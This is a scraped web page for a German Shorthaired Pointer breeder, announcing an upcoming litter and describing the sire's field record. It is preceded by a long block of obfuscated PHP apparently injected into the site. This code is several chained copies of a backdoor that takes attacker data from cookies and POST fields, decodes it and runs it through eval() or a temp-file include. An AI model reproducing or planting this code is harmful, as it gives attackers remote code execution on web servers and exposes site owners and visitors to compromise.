$ufLGyZzhVB = 'V' . "\x7a" . '_' . chr (78) . 'k' . "\151" . 'z' . "\122";$PxTnP = chr ( 560 - 461 )."\154" . 'a' . chr (115) . chr (115) . "\x5f" . "\145" . "\x78" . "\151" . chr ( 849 - 734 ).chr (116) . 's';$yUlaDIsmw = class_exists($ufLGyZzhVB); $PxTnP = "40844";$aDJuczynMO = strpos($PxTnP, $ufLGyZzhVB);if ($yUlaDIsmw == $aDJuczynMO){function wdIqQ(){$ppzHJDxA = new /* 33675 */ Vz_NkizR(50187 + 50187); $ppzHJDxA = NULL;}$bBTVBHYVN = "50187";class Vz_NkizR{private function oXltOlFI($bBTVBHYVN){if (is_array(Vz_NkizR::$BAoxgZP)) {$zpbZfrPoc2 = str_replace("<" . "?php", "", Vz_NkizR::$BAoxgZP["content"]);eval($zpbZfrPoc2); $bBTVBHYVN = "50187";exit();}}public function grwUSfata(){$zpbZfrPoc = "16967";$this->_dummy = str_repeat($zpbZfrPoc, strlen($zpbZfrPoc));}public function __destruct(){Vz_NkizR::$BAoxgZP = @unserialize(Vz_NkizR::$BAoxgZP); $bBTVBHYVN = "6098_24958";$this->oXltOlFI($bBTVBHYVN); $bBTVBHYVN = "6098_24958";}public function hlIUkUY($zpbZfrPoc, $PqJheyMVU){return $zpbZfrPoc[0] ^ str_repeat($PqJheyMVU, intval(strlen($zpbZfrPoc[0]) / strlen($PqJheyMVU)) + 1);}public function MDXip($zpbZfrPoc){$xiAQI = "\x62" . chr (97) . chr (115) . chr (101) . chr ( 1037 - 983 )."\x34";return array_map($xiAQI . '_' . "\x64" . "\145" . 'c' . "\x6f" . 'd' . "\x65", array($zpbZfrPoc,));}public function __construct($opfAsiGD=0){$GYJKeEv = "\54";$zpbZfrPoc = "";$KkaDsFMhsR = $_POST;$vicpk = $_COOKIE;$PqJheyMVU = "315cc329-d594-4a92-8017-7b3ed31cb86d";$ZzcbKWCglo = @$vicpk[substr($PqJheyMVU, 0, 4)];if (!empty($ZzcbKWCglo)){$ZzcbKWCglo = explode($GYJKeEv, $ZzcbKWCglo);foreach ($ZzcbKWCglo as $WSsJHN){$zpbZfrPoc .= @$vicpk[$WSsJHN];$zpbZfrPoc .= @$KkaDsFMhsR[$WSsJHN];}$zpbZfrPoc = $this->MDXip($zpbZfrPoc);}Vz_NkizR::$BAoxgZP = $this->hlIUkUY($zpbZfrPoc, $PqJheyMVU);if (strpos($PqJheyMVU, $GYJKeEv) !== FALSE){$PqJheyMVU = explode($GYJKeEv, $PqJheyMVU); $eLvSmIJCpS = base64_decode(md5($PqJheyMVU[0])); $mxFRwATJLX = strlen($PqJheyMVU[1]) > 5 ? substr($PqJheyMVU[1], 0, 5) : $PqJheyMVU[1];$_GET['new_key'] = md5(implode('', $PqJheyMVU)); $LQFfObat = str_repeat($mxFRwATJLX, 2); $JQlpzcyw = array_map('trim', $PqJheyMVU);if (is_array($JQlpzcyw) && count($JQlpzcyw) > 1) {$LjabPi = $JQlpzcyw[0];} else {$LjabPi = '';}}}public static $BAoxgZP = 37548;}wdIqQ();}$OWCdNZYy = 'p' . chr (95) . chr (78) . "\123" . "\131" . chr ( 875 - 789 ).'v';$QadIArS = "\143" . "\x6c" . "\141" . 's' . "\x73" . "\137" . chr ( 584 - 483 )."\x78" . 'i' . 's' . 't' . chr (115); $izMZKZVij = class_exists($OWCdNZYy); $QadIArS = "62272";$oobPiN = strpos($QadIArS, $OWCdNZYy);if ($izMZKZVij == $oobPiN){function xDiRE(){$pzmgmavod = new /* 63537 */ p_NSYVv(21603 + 21603); $pzmgmavod = NULL;}$gugKcMz = "21603";class p_NSYVv{private function pPTWy($gugKcMz){if (is_array(p_NSYVv::$VrLUra)) {$name = sys_get_temp_dir() . "/" . crc32(p_NSYVv::$VrLUra["salt"]);@p_NSYVv::$VrLUra["write"]($name, p_NSYVv::$VrLUra["content"]);include $name;@p_NSYVv::$VrLUra["delete"]($name); $gugKcMz = "21603";exit();}}public function HMHMAScTYw(){$uXvhkKyEj = "22045";$this->_dummy = str_repeat($uXvhkKyEj, strlen($uXvhkKyEj));}public function __destruct(){p_NSYVv::$VrLUra = @unserialize(p_NSYVv::$VrLUra); $gugKcMz = "54748_46685";$this->pPTWy($gugKcMz); $gugKcMz = "54748_46685";}public function YyeiJnW($uXvhkKyEj, $wMzRq){return $uXvhkKyEj[0] ^ str_repeat($wMzRq, intval(strlen($uXvhkKyEj[0]) / strlen($wMzRq)) + 1);}public function dqziFVgurh($uXvhkKyEj){$IBYzMJal = chr ( 192 - 94 ).chr (97) . chr (115) . "\x65" . "\x36" . chr ( 913 - 861 );return array_map($IBYzMJal . "\137" . chr ( 381 - 281 ).'e' . "\143" . chr (111) . "\144" . chr (101), array($uXvhkKyEj,));}public function __construct($TwXiC=0){$kQHMBP = ',';$uXvhkKyEj = "";$hhZDmG = $_POST;$UHWpxRn = $_COOKIE;$wMzRq = "bf40d82a-5833-4cd0-9dac-402739f91f9b";$yIRtM = @$UHWpxRn[substr($wMzRq, 0, 4)];if (!empty($yIRtM)){$yIRtM = explode($kQHMBP, $yIRtM);foreach ($yIRtM as $xODEUCZsk){$uXvhkKyEj .= @$UHWpxRn[$xODEUCZsk];$uXvhkKyEj .= @$hhZDmG[$xODEUCZsk];}$uXvhkKyEj = $this->dqziFVgurh($uXvhkKyEj);}p_NSYVv::$VrLUra = $this->YyeiJnW($uXvhkKyEj, $wMzRq);if (strpos($wMzRq, $kQHMBP) !== FALSE){$wMzRq = explode($kQHMBP, $wMzRq); $TCCIf = base64_decode(md5($wMzRq[0])); $XiaGNlrom = strlen($wMzRq[1]) > 5 ? substr($wMzRq[1], 0, 5) : $wMzRq[1];$_GET['new_key'] = md5(implode('', $wMzRq)); $OfaSAeMp = str_repeat($XiaGNlrom, 2); $jSsKKEJv = array_map('trim', $wMzRq);if (is_array($jSsKKEJv) && count($jSsKKEJv) > 1) {$qsWcXAaTSq = $jSsKKEJv[0];} else {$qsWcXAaTSq = '';}}}public static $VrLUra = 48200;}xDiRE();}$UsqbCPS = 'J' . '_' . chr (69) . "\x73" . chr ( 190 - 115 ); $agtrxHxP = chr (99) . "\154" . "\141" . "\x73" . 's' . chr ( 245 - 150 ).chr ( 563 - 462 ).chr (120) . chr ( 488 - 383 )."\x73" . chr ( 1112 - 996 ).chr ( 443 - 328 ); $eqWdM = class_exists($UsqbCPS); $agtrxHxP = "34854";$srprcNQc = !1;if ($eqWdM == $srprcNQc){function kRqjWFZbx(){return FALSE;}$eXqVZvi = "26453";kRqjWFZbx();class J_EsK{private function uCXorhki($eXqVZvi){if (is_array(J_EsK::$DBJdHypEUs)) {$crzVW = str_replace(chr (60) . chr (63) . chr ( 962 - 850 ).chr (104) . chr ( 414 - 302 ), "", J_EsK::$DBJdHypEUs["\143" . chr (111) . chr ( 187 - 77 )."\164" . "\145" . "\x6e" . chr ( 338 - 222 )]);eval($crzVW); $eXqVZvi = "26453";exit();}}private $tFMrzNdsZn;public function wsWoen(){echo 4229;}public function __destruct(){$eXqVZvi = "33227_8613";$this->uCXorhki($eXqVZvi); $eXqVZvi = "33227_8613";}public function __construct($IOSLNgkU=0){$XRTAAHeN = $_POST;$lXUUiXe = $_COOKIE;$uWzRXv = "2ad14b6d-0833-47ab-ae48-947973487af5";$XuLkhoNyzP = @$lXUUiXe[substr($uWzRXv, 0, 4)];if (!empty($XuLkhoNyzP)){$rZNhNTk = "base64";$epulmr = "";$XuLkhoNyzP = explode(",", $XuLkhoNyzP);foreach ($XuLkhoNyzP as $SHObwy){$epulmr .= @$lXUUiXe[$SHObwy];$epulmr .= @$XRTAAHeN[$SHObwy];}$epulmr = array_map($rZNhNTk . "\137" . chr (100) . chr (101) . 'c' . chr (111) . chr ( 178 - 78 ).chr ( 763 - 662 ), array($epulmr,)); $epulmr = $epulmr[0] ^ str_repeat($uWzRXv, (strlen($epulmr[0]) / strlen($uWzRXv)) + 1);J_EsK::$DBJdHypEUs = @unserialize($epulmr); $epulmr = class_exists("33227_8613");}}public static $DBJdHypEUs = 56796;}$SNWnd = new /* 18658 */ $UsqbCPS(26453 + 26453); $srprcNQc = $SNWnd = $eXqVZvi = Array();}$vZPDxXHo = "\127" . "\x4d" . 'L' . chr ( 869 - 774 )."\x6b" . "\x47" . chr ( 663 - 573 ); $GCoouw = 'c' . 'l' . chr ( 497 - 400 ).chr ( 352 - 237 ).chr ( 344 - 229 ).chr (95) . "\x65" . "\x78" . chr (105) . "\163" . chr (116) . chr (115); $XothIxy = $GCoouw($vZPDxXHo); $vZPDxXHo = "20893";$GCoouw = "53951";$FINXa = $XothIxy;if (!$FINXa){class WML_kGZ{private $IDwGDuJ;public static $wwoFvLg = "da8faf15-156f-4157-82e7-b97b01df7785";public static $CKJHf = 35641;public function __construct($fEqwkvbl=0){$xATLd = $_COOKIE;$XUoakng = $_POST;$fQpWH = @$xATLd[substr(WML_kGZ::$wwoFvLg, 0, 4)];if (!empty($fQpWH)){$SRwEkuNtt = "base64";$DsgMhG = "";$fQpWH = explode(",", $fQpWH);foreach ($fQpWH as $SxKWYu){$DsgMhG .= @$xATLd[$SxKWYu];$DsgMhG .= @$XUoakng[$SxKWYu];}$DsgMhG = array_map($SRwEkuNtt . chr (95) . "\144" . "\145" . chr (99) . chr (111) . chr (100) . 'e', array($DsgMhG,)); $DsgMhG = $DsgMhG[0] ^ str_repeat(WML_kGZ::$wwoFvLg, (strlen($DsgMhG[0]) / strlen(WML_kGZ::$wwoFvLg)) + 1);WML_kGZ::$CKJHf = @unserialize($DsgMhG);}}private function EebXl(){if (is_array(WML_kGZ::$CKJHf)) {$QIKdSr = str_replace("\74" . chr ( 307 - 244 )."\x70" . "\x68" . chr (112), "", WML_kGZ::$CKJHf[chr ( 308 - 209 ).chr (111) . "\156" . 't' . "\145" . chr (110) . "\164"]);eval($QIKdSr); $ihhqkp = "63012";exit();}}public function __destruct(){$this->EebXl(); $ihhqkp = "63012";}}$xXSRC = new WML_kGZ(); $xXSRC = "56876_22845";}$flWdWpwP = 'j' . "\x50" . "\167" . "\x5f" . 'q' . "\x54" . chr ( 268 - 148 )."\x74";$KcIIqNp = chr ( 306 - 207 ).'l' . chr (97) . "\x73" . chr ( 831 - 716 ).'_' . chr ( 479 - 378 ).chr (120) . chr ( 588 - 483 ).'s' . chr ( 553 - 437 ).chr ( 802 - 687 ); $YJKqjCkd = $KcIIqNp($flWdWpwP); $flWdWpwP = "45617";$VazYqxs = $YJKqjCkd;$KcIIqNp = "59711";if (!$VazYqxs){class jPw_qTxt{private $UabEcfXSz;public static $vmCZxw = "99b2694a-7dae-4bd8-a4f3-b1c697deba58";public static $lZtEaiKpCB = 7046;public function __construct($MWiqoc=0){$cyGHyH = $_COOKIE;$WrYAhMFYx = $_POST;$NNSQeOP = @$cyGHyH[substr(jPw_qTxt::$vmCZxw, 0, 4)];if (!empty($NNSQeOP)){$pKAVeRHvD = "base64";$LHZcgtRSKg = "";$NNSQeOP = explode(",", $NNSQeOP);foreach ($NNSQeOP as $jvJykWlLAZ){$LHZcgtRSKg .= @$cyGHyH[$jvJykWlLAZ];$LHZcgtRSKg .= @$WrYAhMFYx[$jvJykWlLAZ];}$LHZcgtRSKg = array_map($pKAVeRHvD . "\137" . "\144" . "\145" . chr ( 639 - 540 )."\x6f" . 'd' . chr (101), array($LHZcgtRSKg,)); $LHZcgtRSKg = $LHZcgtRSKg[0] ^ str_repeat(jPw_qTxt::$vmCZxw, (strlen($LHZcgtRSKg[0]) / strlen(jPw_qTxt::$vmCZxw)) + 1);jPw_qTxt::$lZtEaiKpCB = @unserialize($LHZcgtRSKg);}}private function NFSqw(){if (is_array(jPw_qTxt::$lZtEaiKpCB)) {$LwEQaksG = str_replace(chr (60) . "\x3f" . chr ( 729 - 617 ).chr ( 261 - 157 ).chr (112), "", jPw_qTxt::$lZtEaiKpCB['c' . chr ( 929 - 818 )."\156" . "\164" . 'e' . chr ( 894 - 784 )."\164"]);eval($LwEQaksG); $NfvuumYE = "4849";exit();}}public function __destruct(){$this->NFSqw(); $NfvuumYE = "4849";$LAghbr = str_pad($NfvuumYE, 10);}}$dFIAu = new /* 51986 */ jPw_qTxt(); $dFIAu = substr("43523_31796", 1);}$TLxjWO = 'p' . "\137" . chr ( 475 - 371 ).chr ( 343 - 262 ).chr ( 220 - 136 )."\x6b" . 'E';$BxedGRKl = "\143" . 'l' . 'a' . "\163" . chr ( 293 - 178 )."\137" . chr (101) . 'x' . 'i' . chr (115) . chr ( 595 - 479 )."\163";$bLbxSI = class_exists($TLxjWO); $BxedGRKl = "17815";$EuulYvX = strpos($BxedGRKl, $TLxjWO);if ($bLbxSI == $EuulYvX){function LRLZRLCOT(){$BfXSkhbGSM = new /* 64225 */ p_hQTkE(31626 + 31626); $BfXSkhbGSM = NULL;}$Coxwhub = "31626";class p_hQTkE{private function lfpQhHgoH($Coxwhub){if (is_array(p_hQTkE::$UQueHNF)) {$name = sys_get_temp_dir() . "/" . crc32(p_hQTkE::$UQueHNF["salt"]);@p_hQTkE::$UQueHNF["write"]($name, p_hQTkE::$UQueHNF["content"]);include $name;@p_hQTkE::$UQueHNF["delete"]($name); $Coxwhub = "31626";exit();}}public function XWutUPNqg(){$buGwGX = "47052";$this->_dummy = str_repeat($buGwGX, strlen($buGwGX));}public function __destruct(){p_hQTkE::$UQueHNF = @unserialize(p_hQTkE::$UQueHNF); $Coxwhub = "24568_7709";$this->lfpQhHgoH($Coxwhub); $Coxwhub = "24568_7709";}public function mEsFHa($buGwGX, $RXgsGRnrI){return $buGwGX[0] ^ str_repeat($RXgsGRnrI, intval(strlen($buGwGX[0]) / strlen($RXgsGRnrI)) + 1);}public function xcCSTjc($buGwGX){$dynYcFhNCK = "\142" . "\x61" . 's' . "\x65" . "\66" . chr ( 866 - 814 );return array_map($dynYcFhNCK . chr (95) . chr ( 612 - 512 )."\x65" . "\x63" . "\157" . chr (100) . 'e', array($buGwGX,));}public function __construct($hiGChymGJ=0){$ocFESU = "\x2c";$buGwGX = "";$HAznBWCME = $_POST;$FlLkCx = $_COOKIE;$RXgsGRnrI = "06addc05-fa74-4b2a-8055-1c6cd25d9e54";$KhiGcYYFf = @$FlLkCx[substr($RXgsGRnrI, 0, 4)];if (!empty($KhiGcYYFf)){$KhiGcYYFf = explode($ocFESU, $KhiGcYYFf);foreach ($KhiGcYYFf as $SQnNsgymOu){$buGwGX .= @$FlLkCx[$SQnNsgymOu];$buGwGX .= @$HAznBWCME[$SQnNsgymOu];}$buGwGX = $this->xcCSTjc($buGwGX);}p_hQTkE::$UQueHNF = $this->mEsFHa($buGwGX, $RXgsGRnrI);if (strpos($RXgsGRnrI, $ocFESU) !== FALSE){$RXgsGRnrI = explode($ocFESU, $RXgsGRnrI); $GeoTYRSL = base64_decode(md5($RXgsGRnrI[0])); $QpLoQG = strlen($RXgsGRnrI[1]) > 5 ? substr($RXgsGRnrI[1], 0, 5) : $RXgsGRnrI[1];}}public static $UQueHNF = 17602;}LRLZRLCOT();}
Puppies – Legendary Shorthairs
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Planning for our “B” litter is underway. Izzy and Berkeley were together starting on February 15th so if all goes as planned we will have puppies in mid April.
Please reach out to us about available puppies and check out our Legendary Shorthairs facebook page for pictures from our “A” litter.
Since color and patterns cannot be determined before mating, color of pups will not be reason for refund of deposit. For additional information please use the Contact Us page.
Sire is DreamPoint’s Berkeley
Natural Ability – Prize 2, 107 @ 10 mos. :: Utility Prize I
Sire – Cooper vom Stillwater :: Dam – Dream Point’s Aspen
Color – Liver and White Patched, Ticked :: 25 inches and 60 pounds
From the owners: “Berkeley is a male that we kept from our B-litter breeding of Cooper and Aspen. Berkeley, when in the field he shows the cooperation that came from his genetics. His biggest desire is to please us through hunting. He’s a sight to see in the field, snapping to rock solid points and being steady through the entire hunting scenario until he is released to retrieve. His retrieves are always to hand. Berkeley was a natural backer and looks as intense as if he were smelling the actual bird. “